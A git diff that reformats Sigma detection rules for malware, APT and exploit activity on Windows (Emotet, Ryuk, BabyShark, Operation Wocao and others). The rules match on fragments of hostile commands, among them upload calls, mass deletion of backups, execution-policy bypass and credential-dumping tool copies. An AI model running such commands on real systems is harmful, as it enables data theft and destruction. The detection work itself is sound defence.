https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/ author: '@41thexplorer, Microsoft Defender ATP' @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc + CommandLine|contains: abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc condition: process_creation and selection level: high ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml b/sigma/sysmon/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml index e48e338c6..a8283bbbb 100644 --- a/sigma/sysmon/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml +++ b/sigma/sysmon/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml @@ -1,8 +1,7 @@ title: Potential BearLPE Exploitation id: 931b6802-d6a6-4267-9ffa-526f57f22aaf status: test -description: Detects potential exploitation of the BearLPE exploit using Task Scheduler - ".job" import arbitrary DACL write\par +description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par references: - https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp author: Olaf Hartong @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \schtasks.exe - - OriginalFileName: schtasks.exe + - Image|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /change - /TN - /RU diff --git a/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml b/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml index e9f33c85e..1f2119dd2 100644 --- a/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml +++ b/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1378/proc_creation_win_exploit_cve_2019_1378.yml @@ -1,8 +1,7 @@ title: Exploiting SetupComplete.cmd CVE-2019-1378 id: 1c373b6d-76ce-4553-997d-8c1da9a6b5f5 status: test -description: Detects exploitation attempt of privilege escalation vulnerability via - SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 +description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 references: - https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro diff --git a/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml b/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml index d6b21c148..4d1ab81c0 100644 --- a/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml +++ b/sigma/sysmon/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml @@ -1,8 +1,7 @@ title: Exploiting CVE-2019-1388 id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c status: stable -description: Detects an exploitation attempt in which the UAC consent dialogue is - used to invoke an Internet Explorer process running as LOCAL_SYSTEM +description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM references: - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388 - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege @@ -25,11 +24,11 @@ detection: selection: ParentImage|endswith: \consent.exe Image|endswith: \iexplore.exe - CommandLine|contains: ' http' + CommandLine|contains: ' http' rights1: - IntegrityLevel: System + IntegrityLevel: System # for Sysmon users rights2: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and (selection and ( rights1 or rights2 )) diff --git a/sigma/sysmon/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml b/sigma/sysmon/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml index b4f57d86a..22d3742c7 100644 --- a/sigma/sysmon/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml +++ b/sigma/sysmon/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml @@ -25,14 +25,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains|all: - - powershell.exe mshta.exe http - - .hta - - CommandLine|contains: - - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server - Client\Default" - - cmd.exe /c taskkill /im cmd.exe - - (New-Object System.Net.WebClient).UploadFile('http + - CommandLine|contains|all: + - powershell.exe mshta.exe http + - .hta + - CommandLine|contains: + - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" + - cmd.exe /c taskkill /im cmd.exe + - (New-Object System.Net.WebClient).UploadFile('http condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml b/sigma/sysmon/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml index 5bc979968..90ee0ff0e 100644 --- a/sigma/sysmon/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml +++ b/sigma/sysmon/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml @@ -5,8 +5,7 @@ description: Detects potential Dridex acitvity via specific process patterns references: - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3 - https://redcanary.com/threat-detection-report/threats/dridex/ -author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron - Systems) +author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/10 modified: 2023/02/03 tags: @@ -27,7 +26,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_svchost: Image|endswith: \svchost.exe - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \Desktop\ filter_svchost: @@ -35,24 +34,22 @@ detection: selection_regsvr: ParentImage|endswith: \excel.exe Image|endswith: \regsvr32.exe - CommandLine|contains: + CommandLine|contains: - ' -s ' - \AppData\Local\Temp\ filter_regsvr: - CommandLine|contains: .dll + CommandLine|contains: .dll selection_anomaly_parent: ParentImage|endswith: \svchost.exe selection_anomaly_child_1: Image|endswith: \whoami.exe - CommandLine|contains: ' /all' + CommandLine|contains: ' /all' selection_anomaly_child_2: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains: ' view' - condition: process_creation and ((selection_svchost and not filter_svchost) or - (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and - 1 of selection_anomaly_child_*)) + CommandLine|contains: ' view' + condition: process_creation and ((selection_svchost and not filter_svchost) or (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and 1 of selection_anomaly_child_*)) falsepositives: - Unlikely level: critical diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml b/sigma/sysmon/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml index a5f67a436..63605347c 100644 --- a/sigma/sysmon/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml +++ b/sigma/sysmon/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml @@ -24,15 +24,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_ping: - CommandLine|contains|all: + CommandLine|contains|all: - 'ping -n ' - ' echo EEEE > ' selection_ipconfig: - CommandLine|contains|all: + CommandLine|contains|all: - ipconfig /all - \temp\res.ip selection_netsh: - CommandLine|contains|all: + CommandLine|contains|all: - interface ip show config - \temp\netsh.res condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml b/sigma/sysmon/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml index 7b006a281..aebeaedd9 100644 --- a/sigma/sysmon/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml +++ b/sigma/sysmon/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml @@ -1,8 +1,7 @@ title: Potential Emotet Activity id: d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18 status: stable -description: Detects all Emotet like process executions that are not covered by the - more generic rules +description: Detects all Emotet like process executions that are not covered by the more generic rules references: - https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/ - https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/ @@ -26,20 +25,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ' -e* PAA' - - JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ - - QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA - - kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA - - IgAoACcAKgAnACkAOwAkA - - IAKAAnACoAJwApADsAJA - - iACgAJwAqACcAKQA7ACQA + - JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ # $env:userprofile + - QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA # $env:userprofile + - kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA # $env:userprofile + - IgAoACcAKgAnACkAOwAkA # "('*');$ + - IAKAAnACoAJwApADsAJA # "('*');$ + - iACgAJwAqACcAKQA7ACQA # "('*');$ - JABGAGwAeAByAGgAYwBmAGQ - - PQAkAGUAbgB2ADoAdABlAG0AcAArACgA - - 0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA - - 9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA + - PQAkAGUAbgB2ADoAdABlAG0AcAArACgA # =$env:temp+( + - 0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA # =$env:temp+( + - 9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA # =$env:temp+( filter: - CommandLine|contains: + CommandLine|contains: - fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ - wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA - 8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml b/sigma/sysmon/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml index 78a5a9c35..de9f45383 100644 --- a/sigma/sysmon/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml +++ b/sigma/sysmon/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml @@ -1,10 +1,7 @@ title: Formbook Process Creation id: 032f5fb3-d959-41a5-9263-4173c802dc2b status: test -description: Detects Formbook like process executions that inject code into a set - of files in the System32 folder, which executes a special command command line - to delete the dropper from the AppData Temp folder. We avoid false positives by - excluding all parent process with command line parameters. +description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters. references: - https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer - https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/ @@ -26,28 +23,31 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: + # Parent command line should not contain a space value + # This avoids false positives not caused by process injection + # e.g. wscript.exe /B sysmon-install.vbs ParentCommandLine|startswith: - C:\Windows\System32\ - C:\Windows\SysWOW64\ ParentCommandLine|endswith: .exe selection2: - - CommandLine|contains|all: - - /c - - del - - C:\Users\ - - \AppData\Local\Temp\ - - CommandLine|contains|all: - - /c - - del - - C:\Users\ - - \Desktop\ - - CommandLine|contains|all: - - /C - - type nul > - - C:\Users\ - - \Desktop\ + - CommandLine|contains|all: + - /c + - del + - C:\Users\ + - \AppData\Local\Temp\ + - CommandLine|contains|all: + - /c + - del + - C:\Users\ + - \Desktop\ + - CommandLine|contains|all: + - /C + - type nul > + - C:\Users\ + - \Desktop\ selection3: - CommandLine|endswith: .exe + CommandLine|endswith: .exe condition: process_creation and (all of selection*) fields: - CommandLine diff --git a/sigma/sysmon/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml b/sigma/sysmon/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml index e933ace2d..d8b9791bf 100644 --- a/sigma/sysmon/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml +++ b/sigma/sysmon/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml @@ -22,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: -i SM-tgytutrc -s + CommandLine|contains: -i SM-tgytutrc -s condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml b/sigma/sysmon/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml index f730a4052..f18ee0e9b 100644 --- a/sigma/sysmon/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml +++ b/sigma/sysmon/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml @@ -1,8 +1,7 @@ title: Potential QBot Activity id: 4fcac6eb-0287-4090-8eea-2602e4c20040 status: stable -description: Detects potential QBot activity by looking for process executions used - previously by QBot +description: Detects potential QBot activity by looking for process executions used previously by QBot references: - https://twitter.com/killamjr/status/1179034907932315648 - https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/ @@ -25,9 +24,9 @@ detection: ParentImage|endswith: \WinRAR.exe Image|endswith: \wscript.exe selection2: - CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type ' + CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type ' selection3: - CommandLine|contains|all: + CommandLine|contains|all: - regsvr32.exe - C:\ProgramData - .tmp diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml b/sigma/sysmon/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml index 6af092a9e..bda5c72f8 100644 --- a/sigma/sysmon/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml +++ b/sigma/sysmon/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml @@ -1,17 +1,16 @@ title: Potential Ryuk Ransomware Activity id: c37510b8-2107-4b78-aa32-72f251e7a844 related: - - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27 - type: similar - - id: 0acaad27-9f02-4136-a243-c357202edd74 - type: obsoletes + - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27 + type: similar + - id: 0acaad27-9f02-4136-a243-c357202edd74 + type: obsoletes status: stable description: Detects Ryuk ransomware activity references: - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/ - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ -author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron - Systems) +author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems) date: 2019/12/16 modified: 2023/02/03 tags: @@ -27,11 +26,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_reg: - CommandLine|contains|all: + CommandLine|contains|all: - Microsoft\Windows\CurrentVersion\Run - C:\users\Public\ selection_del: - CommandLine|contains|all: + CommandLine|contains|all: - del /s /f /q c:\ - \*.bac - \*.bak @@ -40,10 +39,10 @@ detection: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' stop ' - ' /y' - CommandLine|contains: + CommandLine|contains: - samss - audioendpointbuilder - unistoresvc_ diff --git a/sigma/sysmon/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml b/sigma/sysmon/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml index b8e18f264..8faefa546 100644 --- a/sigma/sysmon/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml +++ b/sigma/sysmon/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml @@ -1,8 +1,7 @@ title: Potential Snatch Ransomware Activity id: 5325945e-f1f0-406e-97b8-65104d393fff status: stable -description: Detects specific process characteristics of Snatch ransomware word document - droppers +description: Detects specific process characteristics of Snatch ransomware word document droppers references: - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ author: Florian Roth (Nextron Systems) @@ -21,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: - - shutdown /r /f /t 00 + CommandLine|contains: + - shutdown /r /f /t 00 # Shutdown in safe mode immediately - net stop SuperBackupMan condition: process_creation and selection fields: @@ -30,7 +29,6 @@ fields: - User - Image falsepositives: - - Scripts that shutdown the system immediately and reboot them in safe mode are - unlikely + - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely level: high ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml b/sigma/sysmon/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml index f154e6199..0786d698b 100644 --- a/sigma/sysmon/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml +++ b/sigma/sysmon/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml @@ -1,12 +1,10 @@ title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0 status: test -description: Detects potential BlueMushroom DLL loading activity via regsvr32 from - AppData Local +description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local references: - https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg -author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron - Systems) +author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/02 modified: 2023/03/29 tags: @@ -22,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - regsvr32 - \AppData\Local\ - .dll diff --git a/sigma/sysmon/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml b/sigma/sysmon/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml index a00b503b2..ac8fbff08 100644 --- a/sigma/sysmon/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml +++ b/sigma/sysmon/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml @@ -1,8 +1,7 @@ title: APT31 Judgement Panda Activity id: 03e2746e-2b31-42f1-ab7a-eb39365b2422 status: test -description: Detects APT31 Judgement Panda activity as described in the Crowdstrike - 2019 Global Threat Report +description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Florian Roth (Nextron Systems) @@ -24,15 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_ldifde: - CommandLine|contains|all: + CommandLine|contains|all: - ldifde - -f -n - eprod.ldf selection_lateral_movement: - CommandLine|contains|all: + CommandLine|contains|all: - copy \\\\ - c$ - CommandLine|contains: + CommandLine|contains: - \aaaa\procdump64.exe - \aaaa\netsess.exe - \aaaa\7za.exe diff --git a/sigma/sysmon/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml b/sigma/sysmon/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml index 3768537ea..7f3cf388d 100644 --- a/sigma/sysmon/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml +++ b/sigma/sysmon/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml @@ -1,8 +1,7 @@ title: Potential Russian APT Credential Theft Activity id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee status: stable -description: Detects Russian group activity as described in Global Threat Report 2019 - by Crowdstrike +description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Florian Roth (Nextron Systems) @@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_xcopy: - CommandLine|contains|all: + CommandLine|contains|all: - xcopy /S /E /C /Q /H \\\\ - \sysvol\ selection_adexplorer: - CommandLine|contains|all: + CommandLine|contains|all: - adexplorer -snapshot "" c:\users\ - \downloads\ - .snp diff --git a/sigma/sysmon/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml b/sigma/sysmon/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml index 9de6455b5..aaf3eeb84 100644 --- a/sigma/sysmon/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml +++ b/sigma/sysmon/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml @@ -21,8 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: - - /e:jscript + CommandLine|contains|all: + - /e:jscript # This is a guess since the report doesn't mention the method of execution. This assumes that it is achieved via specifying the execution engine - \Local\Temp\Errors.bat condition: process_creation and selection falsepositives: diff --git a/sigma/sysmon/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml b/sigma/sysmon/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml index f281b2122..1e4a9a1d5 100644 --- a/sigma/sysmon/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml +++ b/sigma/sysmon/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml @@ -1,8 +1,7 @@ title: Equation Group DLL_U Export Function Load id: d465d1d8-27a2-4cca-9621-a800f37cf72e status: stable -description: Detects a specific export function name used by one of EquationGroup - tools +description: Detects a specific export function name used by one of EquationGroup tools references: - https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type= - https://twitter.com/cyb3rops/status/972186477512839170 @@ -23,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains: -export dll_u - - CommandLine|endswith: - - ',dll_u' - - ' dll_u' + - CommandLine|contains: -export dll_u + - CommandLine|endswith: + - ',dll_u' + - ' dll_u' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml b/sigma/sysmon/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml index b51346e16..c38b850de 100644 --- a/sigma/sysmon/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml +++ b/sigma/sysmon/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml @@ -22,16 +22,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cli: - - CommandLine|contains: - - Temp\wtask.exe /create - - '%windir:~-3,1%%PUBLIC:~-9,1%' - - '/tn "Security Script ' - - '%windir:~-1,1%' - - CommandLine|contains|all: - - /E:vbscript - - C:\Users\ - - .txt - - /F + - CommandLine|contains: + - Temp\wtask.exe /create + - '%windir:~-3,1%%PUBLIC:~-9,1%' + - '/tn "Security Script ' + - '%windir:~-1,1%' + - CommandLine|contains|all: + - /E:vbscript + - C:\Users\ + - .txt + - /F selection_img: Image|endswith: Temp\winwsh.exe condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml b/sigma/sysmon/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml index 410d021b3..f2cca90da 100644 --- a/sigma/sysmon/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml +++ b/sigma/sysmon/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml @@ -1,8 +1,8 @@ title: Operation Wocao Activity id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab related: - - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d - type: derived + - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d + type: derived status: test description: Detects activity mentioned in Operation Wocao report references: @@ -25,14 +25,13 @@ tags: logsource: category: process_creation product: windows - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - checkadmin.exe 127.0.0.1 -all - netsh advfirewall firewall add rule name=powershell dir=in - cmd /c powershell.exe -ep bypass -file c:\s.ps1 diff --git a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml index 890133987..9654f6a60 100644 --- a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml +++ b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml @@ -1,8 +1,7 @@ title: Exploited CVE-2020-10189 Zoho ManageEngine id: 846b866e-2a57-46ee-8e16-85fa92759be7 status: test -description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization - vulnerability reported as CVE-2020-10189 +description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 references: - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224 diff --git a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml index 517484a68..2446a0a65 100644 --- a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml +++ b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml @@ -1,8 +1,7 @@ title: Suspicious PrinterPorts Creation (CVE-2020-1048) id: cc08d590-8b90-413a-aff6-31d1a99678d7 status: test -description: Detects new commands that add new printer port which point to suspicious - file +description: Detects new commands that add new printer port which point to suspicious file references: - https://windows-internals.com/printdemon-cve-2020-1048/ author: EagleEye Team, Florian Roth @@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: Add-PrinterPort -Name + CommandLine|contains: Add-PrinterPort -Name selection2: - CommandLine|contains: + CommandLine|contains: - .exe - .dll - .bat selection3: - CommandLine|contains: Generic / Text Only + CommandLine|contains: Generic / Text Only condition: process_creation and ((selection1 and selection2) or selection3) falsepositives: - New printer port install on host diff --git a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml index 723c043c1..685ab5a23 100644 --- a/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml +++ b/sigma/sysmon/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml @@ -1,8 +1,7 @@ title: DNS RCE CVE-2020-1350 id: b5281f31-f9cc-4d0d-95d0-45b91c45b487 status: test 